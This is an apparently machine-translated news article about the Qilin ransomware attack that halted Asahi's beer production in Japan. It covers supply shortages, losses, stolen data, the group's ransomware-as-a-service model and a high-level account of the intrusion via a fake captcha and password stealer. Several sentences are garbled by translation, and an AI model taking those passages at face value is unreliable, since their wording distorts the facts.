Drinking a beer has been difficult for days in the world’s fourth-largest economy, and Japanese bars, restaurants and liquor stores have had a rough start to October. Asahi beer, the most consumed in the country, with a 40% market share, has been in short supply for two weeks due to a cyber attack that paralyzed its production and shipments. This, in turn, meant that competitors such as Kirin or Sapporo could not cope and had to stop accepting orders from factories that were looking for alternative brands.
On September 29th ransomware claimed by the Russian Qilin group, forced the company to close six factories and 30 other plants. These types of attacks are carried out with malicious programs that encrypt and lock systems until a ransom is paid. With computers paralyzed, the company had to temporarily return to manual processes to manage orders and logistics. Everything was managed for two weeks with pen and paper, notifying customers via fax when the trucks were ready to leave the warehouse.
The accident made it physically impossible to manage the usual flows of goods movement in time, so it only took two days for the store shelves to run out of stock. The same thing happened in the hospitality industry: soon the Japanese’s favorite beer was no longer served. Even in the Asahi barracks they could not receive e-mailas reported by the company itself. And they had to postpone the presentation of the quarterly results.
The business recovered little by little, starting with the group’s star beer, the Super Dry brand, until on October 10 all establishments reopened, albeit with reduced capacity. The company has not yet confirmed that it is back to normal. “I would like to express my sincere apologies for any distress caused to our stakeholders by the recent system outage. We appreciate your understanding and support,” Atsushi Katsuki, the group’s president, said in a statement.
The Asahi group produces beer, but also soft drinks, food and alcohol. The cyber attack hit Japan, but not Europe, where drink brands such as Peroni, Pilsner Urquell, Grolsch or Fuller are present. Losses resulting from production disruptions are estimated at approximately $335 million. 27 gigabytes of information, approximately 9,300 files, including financial and budget documents, confidential contracts, planning and development forecasts and internal reports, as well as personal employee information, were stolen. The Qilin group was hanging on the dark web just a few as an example.
Fake Captcha
How did they manage to obtain some results? hackers leave Japan without beer? “The attackers conducted a very sophisticated campaign, in which a variant of a ransomware “Linux infected Windows systems using legitimate remote network management tools,” explains David Sancho, senior threat researcher at Trend Micro. They accessed the brewery’s network using captcha fake, those mechanisms that test users, such as choosing photos in which a car is seen, so that they prove that they are not cars. By clicking on the boxes of those captchaappeared in Asahi’s key employee teams, “a malware which stole network passwords, then allowing them to be used for the rest of the attack. During this period, backups and disaster recovery systems became unusable,” adds Sancho.
Once inside the systems, the attackers searched undetected for sensitive data to encrypt and exfiltrate. Once downloaded, they blocked the equipment and demanded a ransom. But the extortion is twofold. “Investigators who had private conversations with Qilin operators found that, in addition to demanding a ransom, they also attempted to sell the stolen data to Asahi for $10 million. This request was received on October 11, likely as a tactic to cut out intermediaries and accelerate pressure on the victim,” notes Nethaniel Ribco, global cyber threat manager at UST CyberProof.
The Qilin group takes its name from a Chinese mythological creature from which flames emanate and which has the body of a lion, fish scales and deer horns. But it’s not an Asian organization. The fact that its code is written in Russian and that its affiliates’ attacks avoid targets located in the Commonwealth of Independent States raises suspicions of its Russian origin. “There are several clues suggesting that it would have some kind of relationship with other Russian cybercriminal groups such as Scattered Spiders or North Korean groups,” says Josep Albors, director of research and outreach in Spain at cybersecurity firm ESET.
Before launching his attack on Asahi beers, his biggest victim had been in June 2024, when he extorted money from the British medical company Synnovis, which provides diagnostic and pathology services in several London hospitals. He demanded a ransom of 50 million dollars so as not to publish the 400 gigabytes of data he had stolen from him. The attack caused the cancellation of more than 6,000 doctor’s visits and a shortage of blood donations.
The industrialization of “ransomware”
There is something that sets Qilin apart from other cybercriminal groups. They offer theirs software harmful to anyone hackers who manages to access a company network, and then divides the ransom obtained. “It provides affiliates with all the tools and infrastructure needed to launch attacks and, in exchange, they pocket between 15% and 20% of the ransoms paid,” says Eusebio Nieva, Check Point’s technical director for Spain and Portugal.
Providing those who open the door of a company with the tools to steal what’s inside, like those who use the services of a plumber or a lawyer, allows you to industrialize the business ransomware and gain scale. “They operate on a schedule that we call Ransomware as a service“, underlines Sancho, from Trend Micro, the laboratory that discovered this criminal group in August 2022.
This operational scheme has allowed them to become a major international threat in the category of ransomware. In the third quarter of 2025, at least 402 successful attacks were recorded, according to data from analysts Trend Micro, or 21% of the total. “Qilin is one of the most active groups currently. Among its strengths we see that it is a ransomware multiplatform, since in addition to Windows systems, attacks have also been observed against Linux servers. It has quite a reputation for exploiting vulnerabilities in network devices, such as router OR firewall”, underlines Josep Albors, director of research and outreach at ESET Spain.
Another of the strengths of this group is that, to date, it has managed to be very elusive. “Qilin’s infrastructure is designed to resist: they maintain escape websites (leak sites) and command centers hosted in block-proof services, often in countries that do not cooperate with investigations,” says Hervé Lambert, global head of consumer operations at Panda Security.
